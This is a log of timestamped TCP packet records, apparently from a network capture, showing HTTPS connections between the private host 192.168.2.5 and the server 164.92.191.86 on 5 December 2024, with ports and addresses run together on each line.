                                                Dec 5, 2024 08:24:16.546844959 CET49874443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:16.546852112 CET44349874164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:16.598068953 CET49874443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:16.666418076 CET44349875164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:16.666826010 CET49875443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:16.666848898 CET44349875164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:16.668422937 CET44349875164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:16.668509960 CET49875443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:16.669862986 CET49875443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:16.670079947 CET49875443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:16.670088053 CET44349875164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:16.670726061 CET44349875164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:16.722920895 CET49875443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:16.722938061 CET44349875164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:16.775439978 CET49875443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.394531965 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.395407915 CET49877443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.395430088 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.396524906 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.396559000 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.396609068 CET49877443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.396784067 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.396811962 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.397325993 CET49877443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.397394896 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.397524118 CET49877443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.397532940 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.398055077 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.398133039 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.398468018 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.398576021 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.398578882 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.410602093 CET44349879164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.412817955 CET49879443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.412830114 CET44349879164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.413189888 CET44349879164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.413629055 CET49879443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.413697004 CET44349879164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.414077044 CET49879443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.443326950 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.445367098 CET49877443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.445409060 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.445415974 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.459323883 CET44349879164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.491396904 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.602011919 CET44349874164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.602041960 CET44349874164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.602049112 CET44349874164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.602077007 CET44349874164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.602087975 CET44349874164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.602097034 CET44349874164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.602099895 CET49874443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.602119923 CET44349874164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.602142096 CET49874443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.602165937 CET49874443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.602170944 CET44349874164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.602181911 CET44349874164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.602205992 CET49874443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.602252960 CET49874443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.603351116 CET49874443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.603367090 CET44349874164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.680236101 CET44349875164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.680273056 CET44349875164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.680320024 CET49875443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.680347919 CET44349875164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.680362940 CET44349875164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:17.680412054 CET49875443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.681453943 CET49875443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:17.681476116 CET44349875164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.335833073 CET44349879164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.335921049 CET44349879164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.335973978 CET49879443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.336045980 CET49879443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.336061001 CET44349879164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.336074114 CET49879443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.336117983 CET49879443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.651613951 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.651643038 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.651650906 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.651704073 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.651737928 CET49877443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.651743889 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.651760101 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.651789904 CET49877443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.651801109 CET49877443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.690114021 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.690169096 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.690274000 CET49877443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.690294027 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.690305948 CET49877443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.690336943 CET49877443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.715704918 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.715738058 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.715753078 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.715760946 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.715770006 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.715806961 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.715843916 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.715858936 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.715878010 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.758326054 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.843760967 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.843791008 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.843931913 CET49877443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.843957901 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.844016075 CET49877443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.878680944 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.878700972 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.878782034 CET49877443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.878798008 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.878810883 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.878859997 CET49877443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.879539013 CET49877443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.879555941 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.885212898 CET49885443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.885257959 CET44349885164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.885324001 CET49885443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.885622025 CET49885443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.885641098 CET44349885164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.917052984 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.917085886 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.917244911 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.917500019 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.917520046 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.935235977 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.935250998 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.935298920 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.935307980 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.935359955 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.935379982 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.935406923 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.935429096 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.978558064 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.978569031 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.978617907 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.978669882 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.978688955 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:18.978729963 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:18.978755951 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:19.070981979 CET49745443192.168.2.5172.217.17.67
                                                Dec 5, 2024 08:24:19.071002960 CET44349745172.217.17.67192.168.2.5
                                                Dec 5, 2024 08:24:19.108520031 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:19.108541965 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:19.108680010 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:19.108692884 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:19.109481096 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:19.138511896 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:19.138534069 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:19.138637066 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:19.138648987 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:19.138691902 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:19.168755054 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:19.168780088 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:19.168817043 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:19.168905973 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:19.168921947 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:19.168955088 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:19.186027050 CET49887443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:19.186064005 CET44349887164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:19.186171055 CET49887443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:19.186376095 CET49887443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:19.186395884 CET44349887164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:19.208210945 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:19.284379005 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:19.284404039 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:19.284461021 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:19.284481049 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:19.284524918 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:19.284539938 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:19.297183037 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:19.297280073 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:19.297291040 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:19.297344923 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:19.297705889 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:19.297717094 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:20.269043922 CET44349885164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:20.269448042 CET49885443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:20.269464970 CET44349885164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:20.269819975 CET44349885164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:20.270404100 CET49885443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:20.270486116 CET44349885164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:20.270592928 CET49885443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:20.299801111 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:20.300141096 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:20.300157070 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:20.300497055 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:20.301433086 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:20.301512003 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:20.301578045 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:20.315331936 CET44349885164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:20.340935946 CET49893443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:20.340986013 CET44349893164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:20.341058016 CET49893443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:20.341281891 CET49893443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:20.341298103 CET44349893164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:20.343333960 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:20.354598045 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:20.565474033 CET44349887164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:20.565773010 CET49887443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:20.565784931 CET44349887164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:20.567224026 CET44349887164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:20.567301035 CET49887443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:20.568510056 CET49887443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:20.568634033 CET49887443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:20.568639040 CET44349887164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:20.570159912 CET44349887164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:20.612922907 CET49887443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:20.612943888 CET44349887164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:20.658865929 CET49887443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:21.499291897 CET44349887164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.499452114 CET44349887164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.499505043 CET49887443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:21.500248909 CET49887443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:21.500256062 CET44349887164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.616203070 CET44349885164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.616240978 CET44349885164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.616259098 CET44349885164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.616302967 CET49885443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:21.616343975 CET44349885164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.616400003 CET49885443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:21.653747082 CET44349885164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.653801918 CET44349885164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.653837919 CET49885443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:21.653848886 CET44349885164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.653865099 CET49885443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:21.653883934 CET49885443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:21.720671892 CET44349893164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.720968962 CET49893443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:21.721004009 CET44349893164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.721452951 CET44349893164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.721790075 CET49893443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:21.721875906 CET44349893164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.721999884 CET49893443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:21.740047932 CET44349885164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.740070105 CET44349885164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.740175009 CET49885443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:21.740190029 CET44349885164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.740266085 CET49885443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:21.767333984 CET44349893164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.790553093 CET44349885164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.790582895 CET44349885164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.790667057 CET49885443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:21.790678024 CET44349885164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.790708065 CET44349885164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.790769100 CET49885443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:21.791098118 CET49885443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:21.791110992 CET44349885164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.873286009 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.873301983 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.873305082 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.873338938 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.873344898 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.873353958 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.873392105 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:21.873406887 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.873451948 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:21.873491049 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:21.919270039 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.919334888 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.919359922 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:21.919368982 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:21.919409990 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:21.972857952 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.065084934 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.065097094 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.065125942 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.065233946 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.065236092 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.065236092 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.065249920 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.065308094 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.106549978 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.106571913 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.106635094 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.106647015 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.106689930 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.106749058 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.112266064 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.112360954 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.146074057 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.146097898 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.146156073 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.146169901 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.146224022 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.146224022 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.257282019 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.257332087 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.257426977 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.257445097 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.257515907 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.257517099 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.281261921 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.281315088 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.281387091 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.281400919 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.281435966 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.281466961 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.287072897 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.287161112 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.287180901 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.287246943 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.287450075 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.287470102 CET44349886164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.287480116 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.287514925 CET49886443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.299110889 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.299170971 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.299264908 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.299518108 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.299532890 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.312690973 CET49900443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.312736034 CET44349900164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.312839031 CET49900443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.313088894 CET49900443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.313102961 CET44349900164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.314692974 CET49901443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.314739943 CET44349901164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.314872026 CET49901443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.315110922 CET49902443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.315123081 CET44349902164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.315342903 CET49901443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.315362930 CET49902443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.315363884 CET44349901164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.315582991 CET49902443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.315597057 CET44349902164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.653064966 CET44349893164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.653153896 CET44349893164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:22.653232098 CET49893443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.653443098 CET49893443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:22.653464079 CET44349893164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:23.682518959 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:23.691518068 CET44349900164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:23.693166971 CET44349901164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:23.697377920 CET44349902164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:23.730607986 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:23.734697104 CET49900443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:23.734884024 CET49901443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:23.749821901 CET49902443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:23.813594103 CET49902443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:23.813605070 CET44349902164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:23.813741922 CET49901443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:23.813752890 CET44349901164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:23.813841105 CET49900443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:23.813848972 CET44349900164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:23.814141989 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:23.814156055 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:23.814259052 CET44349901164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:23.814403057 CET44349900164.92.191.86192.168.2.5
